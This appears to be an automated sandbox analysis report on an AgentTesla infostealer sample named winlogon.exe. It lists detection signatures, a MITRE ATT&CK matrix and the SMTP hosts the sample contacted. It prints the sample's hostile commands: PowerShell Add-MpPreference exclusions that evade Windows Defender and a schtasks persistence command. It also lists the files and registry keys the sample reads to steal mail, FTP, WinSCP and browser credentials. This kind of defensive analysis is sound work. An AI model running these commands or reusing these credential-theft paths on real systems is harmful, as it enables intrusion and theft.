                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\winlogon.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E50040 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\winlogon.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\winlogon.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000006.00000002.928991406.0000000001300000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Users\user\Desktop\winlogon.exe VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\winlogon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05DF5FDC GetUserNameW,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cf9f30.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cc4110.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cf9f30.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cc4110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.929157483.00000000029B4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6284, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6284, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cf9f30.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cc4110.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cf9f30.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.winlogon.exe.3cc4110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.929157483.00000000029B4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6284, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools11OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information11Credentials in Registry1File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerSystem Information Discovery114SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsSecurity Software Discovery211SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncVirtualization/Sandbox Evasion131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532921 Sample: winlogon.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 8 other signatures 2->42 7 winlogon.exe 7 2->7         started        process3 dnsIp4 30 192.168.2.1 unknown unknown 7->30 24 C:\Users\user\AppData\...\UlhpAjSuVoTa.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\tmpD7F1.tmp, XML 7->26 dropped 28 C:\Users\user\AppData\...\winlogon.exe.log, ASCII 7->28 dropped 44 Uses schtasks.exe or at.exe to add and modify task schedules 7->44 46 Allocates memory in foreign processes 7->46 48 Adds a directory exclusion to Windows Defender 7->48 12 RegSvcs.exe 2 7->12         started        16 powershell.exe 25 7->16         started        18 schtasks.exe 1 7->18         started        file5 signatures6 process7 dnsIp8 32 smtp.stockmeieir.com 12->32 34 us2.smtp.mailhostbox.com 208.91.199.224, 49843, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->34 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->52 54 Tries to steal Mail credentials (via file / registry access) 12->54 56 3 other signatures 12->56 20 conhost.exe 16->20         started        22 conhost.exe 18->22         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      winlogon.exe24%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      6.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://smtp.stockmeieir.com0%Avira URL Cloudsafe
                      http://wwHpow.com0%Avira URL Cloudsafe
                      https://Qr1QL48h5BTOb.com0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      		208.91.199.224
                      		truefalse
                        		high
                        smtp.stockmeieir.com
                        		unknown
                        		unknowntrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
